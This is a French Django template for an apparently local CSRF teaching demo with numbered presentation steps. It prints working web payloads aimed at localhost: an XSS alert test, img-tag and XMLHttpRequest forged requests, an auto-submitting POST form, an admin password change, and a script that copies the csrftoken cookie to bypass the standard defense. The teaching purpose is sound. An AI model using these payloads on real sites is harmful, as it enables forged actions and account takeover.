{% extends 'core/layout.html' %}

{% block content %}


    <div class="container">
        <br>
        <h1>Cross Site Request Forgery</h1>
        <br>
        <div id="accordion">
            <div class="card">
                <div class="card-header" id="headingOne">
                    <h5 class="mb-0">
                        <button class="btn btn-link" data-toggle="collapse" data-target="#collapseOne"
                                aria-expanded="true"
                                aria-controls="collapseOne">
                            <b>1. Présentation</b>
                        </button>
                    </h5>
                </div>

                <div id="collapseOne" class="collapse show" aria-labelledby="headingOne" data-parent="#accordion">
                    <div class="card-body">
                        <div class="float-right">
                            <span class="badge badge-pill badge-secondary">C</span>
                        </div>
                        <p>Présentation rapide du site web</p>
                    </div>
                </div>
            </div>
            <div class="card">
                <div class="card-header" id="headingBdi">
                    <h5 class="mb-0">
                        <button class="btn btn-link" data-toggle="collapse" data-target="#collapseBdi"
                                aria-expanded="false"
                                aria-controls="collapseBdi">
                            <b>2. L'attaque CSRF</b>
                        </button>
                    </h5>
                </div>

                <div id="collapseBdi" class="collapse" aria-labelledby="headingBdi" data-parent="#accordion">
                    <div class="card-body">
                        <div class="float-right">
                            <span class="badge badge-pill badge-secondary">Y</span>
                        </div>
                        Le principe d'une attaque CSRF
                    </div>
                </div>
            </div>
            <div class="card">
                <div class="card-header" id="headingAsd">
                    <h5 class="mb-0">
                        <button class="btn btn-link collapsed" data-toggle="collapse" data-target="#collapseAsd"
                                aria-expanded="false" aria-controls="collapseAsd">
                            <b>3. XSS</b>
                        </button>
                    </h5>
                </div>
                <div id="collapseAsd" class="collapse" aria-labelledby="headingAsd" data-parent="#accordion">
                    <div class="card-body">
                        <div class="float-right">
                            <span class="badge badge-pill badge-secondary">C</span>
                        </div>
                        Démonstration de l'appel avec une balise &lt;script&gt;
                        <br>
                        Uniquement afin de faciliter les tests :
                        <br>
                        <br>
                        <pre>
                            &lt;script&gt;alert('ALED')&lt;/script&gt;
                        </pre>
                    </div>
                </div>
            </div>
            <div class="card">
                <div class="card-header" id="headingTwo">
                    <h5 class="mb-0">
                        <button class="btn btn-link collapsed" data-toggle="collapse" data-target="#collapseTwo"
                                aria-expanded="false" aria-controls="collapseTwo">
                            <b>4. Attaque via une balise img</b>
                        </button>
                    </h5>
                </div>
                <div id="collapseTwo" class="collapse" aria-labelledby="headingTwo" data-parent="#accordion">
                    <div class="card-body">
                        <div class="float-right">
                            <span class="badge badge-pill badge-secondary">H</span>
                        </div>
                        <p>Démonstration de l'appel avec une balise &lt;img&gt;</p>
                        <pre>
                            &lt;img src="http://127.0.0.1:8000/csrf/save_comment?body=HACKED"&gt;
                        </pre>
                        <p>Variante :</p>
                        <pre>
                            &lt;img src="" onerror="a = new XMLHttpRequest(); a.open('GET', 'http://127.0.0.1:8000/csrf/save_comment?body=JSCHACKED'); a.send();"&gt;
                        </pre>
                        <p>Limitation de cet appel : GET</p>
                    </div>
                </div>
            </div>
            <div class="card">
                <div class="card-header" id="headingLdj">
                    <h5 class="mb-0">
                        <button class="btn btn-link collapsed" data-toggle="collapse" data-target="#collapseLdj"
                                aria-expanded="false" aria-controls="collapseLdj">
                            <b>5. Attaque via POST</b>
                        </button>
                    </h5>
                </div>
                <div id="collapseLdj" class="collapse" aria-labelledby="headingLdj" data-parent="#accordion">
                    <div class="card-body">
                        <div class="float-right">
                            <span class="badge badge-pill badge-secondary">H</span>
                        </div>
                        Démonstration de l'appel avec une balise &lt;form&gt;
                        <br>
                        <br>
                        <br>
                        <pre>
                            &lt;form method='POST' action='http://127.0.0.1:8000/csrf/save_comment_post' id="csrf-form"&gt;
                              &lt;input type='hidden' name='body' value='HACKED FROM FORM'&gt;
                              &lt;input type='submit' value='submit'&gt;
                            &lt;/form&gt;
                            &lt;script&gt;document.getElementById("csrf-form").submit()&lt;/script&gt;
                        </pre>
                    </div>
                </div>
            </div>
            <div class="card">
                <div class="card-header" id="headingThree">
                    <h5 class="mb-0">
                        <button class="btn btn-link collapsed" data-toggle="collapse" data-target="#collapseThree"
                                aria-expanded="false" aria-controls="collapseThree">
                            <b>6. Plus que des messages</b>
                        </button>
                    </h5>
                </div>
                <div id="collapseThree" class="collapse" aria-labelledby="headingThree" data-parent="#accordion">
                    <div class="card-body">
                        <div class="float-right">
                            <span class="badge badge-pill badge-secondary">H</span>
                        </div>
                        Changer le mot de passe de l'admin au lieu de poster des messages
                    </div>
                    <br>
                    <br>
                    <pre>
                        &lt;img src="http://127.0.0.1:8000/csrf/update_password?newpassword=toto"&gt;
                    </pre>
                </div>
            </div>
            <div class="card">
                <div class="card-header" id="headingNch">
                    <h5 class="mb-0">
                        <button class="btn btn-link collapsed" data-toggle="collapse" data-target="#collapseNch"
                                aria-expanded="false" aria-controls="collapseNch">
                            <b>7. Défense CSRF standard</b>
                        </button>
                    </h5>
                </div>
                <div id="collapseNch" class="collapse" aria-labelledby="headingNch" data-parent="#accordion">
                    <div class="card-body">
                        <div class="float-right">
                            <span class="badge badge-pill badge-secondary">Y</span>
                        </div>
                        <p>Principe du Synchronizer Pattern - Statefull</p>
                        <p>En réalité : Double Submit Pattern - Stateless</p>
                        <p>Activation de la défense CSRF standard</p>
                        <p>Qu'est-ce qu'elle ajoute</p>
                        <p>Les anciennes attaques</p>
                    </div>
                </div>
            </div>
            <div class="card">
                <div class="card-header" id="headingBku">
                    <h5 class="mb-0">
                        <button class="btn btn-link collapsed" data-toggle="collapse" data-target="#collapseBku"
                                aria-expanded="false" aria-controls="collapseBku">
                            <b>8. Contrer ce CSRF</b>
                        </button>
                    </h5>
                </div>
                <div id="collapseBku" class="collapse" aria-labelledby="headingBku" data-parent="#accordion">
                    <div class="card-body">
                        <div class="float-right">
                            <span class="badge badge-pill badge-secondary">H</span>
                        </div>
                        <p>Possibilité de contrer le CSRF tel que montré</p>
                        <p>Exemple:</p>
                        <br>
                        <pre>
                            &lt;form method='POST' action='http://127.0.0.1:8000/csrf/save_comment_post' id="csrf-form"&gt;
                              &lt;input type='hidden' name='body' value='HACKED FROM FORM'&gt;
                              &lt;input type='submit' value='submit'&gt;
                            &lt;/form&gt;
                            &lt;script&gt;
                            function getCookie(cname) {
                              var name = cname + "=";
                              var decodedCookie = decodeURIComponent(document.cookie);
                              var ca = decodedCookie.split(';');
                              for(var i = 0; i &lt;ca.length; i++) {
                                var c = ca[i];
                                while (c.charAt(0) == ' ') {
                                  c = c.substring(1);
                                }
                                if (c.indexOf(name) == 0) {
                                  return c.substring(name.length, c.length);
                                }
                              }
                              return "";
                            }
                            var csrftoken = getCookie('csrftoken');

                            var newcsrf = document.createElement("input");
                            newcsrf.type = "text";
                            newcsrf.name = "csrfmiddlewaretoken";
                            newcsrf.value = csrftoken;

                            document.getElementById("csrf-form").appendChild(newcsrf);
                            document.getElementById("csrf-form").submit();
                            &lt;/script&gt;

                        </pre>

                    </div>
                </div>
            </div>
            <div class="card">
                <div class="card-header" id="headingMdx">
                    <h5 class="mb-0">
                        <button class="btn btn-link collapsed" data-toggle="collapse" data-target="#collapseMdx"
                                aria-expanded="false" aria-controls="collapseMdx">
                            <b>9. Limitations</b>
                        </button>
                    </h5>
                </div>
                <div id="collapseMdx" class="collapse" aria-labelledby="headingMdx" data-parent="#accordion">
                    <div class="card-body">
                        <div class="float-right">
                            <span class="badge badge-pill badge-secondary">C</span>
                        </div>
                        XSS
                        <br>
                        Sous domaine
                        <br>
                    </div>
                </div>
            </div>
            <div class="card">
                <div class="card-header" id="headingPsx">
                    <h5 class="mb-0">
                        <button class="btn btn-link collapsed" data-toggle="collapse" data-target="#collapsePsx"
                                aria-expanded="false" aria-controls="collapsePsx">
                            <b>10. Un autre exemple de défense CSRF</b>
                        </button>
                    </h5>
                </div>
                <div id="collapsePsx" class="collapse" aria-labelledby="headingPsx" data-parent="#accordion">
                    <div class="card-body">
                        <div class="float-right">
                            <span class="badge badge-pill badge-secondary">C</span>
                        </div>
                        Implémentation de la méthode par chiffrement
                        <br>
                        Limitations
                    </div>
                </div>
            </div>
            <div class="card">
                <div class="card-header" id="headingWkz">
                    <h5 class="mb-0">
                        <button class="btn btn-link collapsed" data-toggle="collapse" data-target="#collapseWkz"
                                aria-expanded="false" aria-controls="collapseWkz">
                            <b>11. Conclusion</b>
                        </button>
                    </h5>
                </div>
                <div id="collapseWkz" class="collapse" aria-labelledby="headingWkz" data-parent="#accordion">
                    <div class="card-body">
                        <div class="float-right">
                            <span class="badge badge-pill badge-secondary">Y</span>
                        </div>
                        Conclusion
                    </div>
                </div>
            </div>
        </div>
    </div>


{% endblock %}
